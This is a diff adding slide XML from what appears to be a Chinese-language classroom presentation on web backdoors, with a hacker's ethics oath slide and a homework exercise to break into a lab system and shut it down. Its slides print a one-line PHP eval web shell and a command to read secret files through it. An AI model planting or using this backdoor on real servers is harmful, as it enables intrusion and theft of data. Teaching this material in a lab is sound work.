+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>傳說中的一句話後門</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;?</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>echo eval</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>($_GET[‘</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>cmd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>’]); ?&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2359365455"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="標題 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>後門 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>Backdoor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="內容版面配置區 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>實作</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>door.php?cmd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>=system(“cat /file.txt”)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>請</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>抓出位於 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>/secret.txt </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>的機密資料</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>5487580.txt</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>password.secret</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>scandals.secret</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2914537323"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{60CBAE8C-1607-4DCA-B7CA-EE4DC857CDE5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>結尾</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F261C513-5033-4178-828E-E4AAAA247642}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>不要做壞事</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" strike="sngStrike" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>就算做了壞事，也不要被</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" strike="sngStrike" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>抓到</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" strike="sngStrike" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" strike="sngStrike" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>功課</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>入侵系統，並且把系統關機</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>關機了才能下課</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1625167004"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="Title 12"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>在開始之前</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>…</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="Content Placeholder 13"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>駭客的道德宣誓</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" strike="sngStrike" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
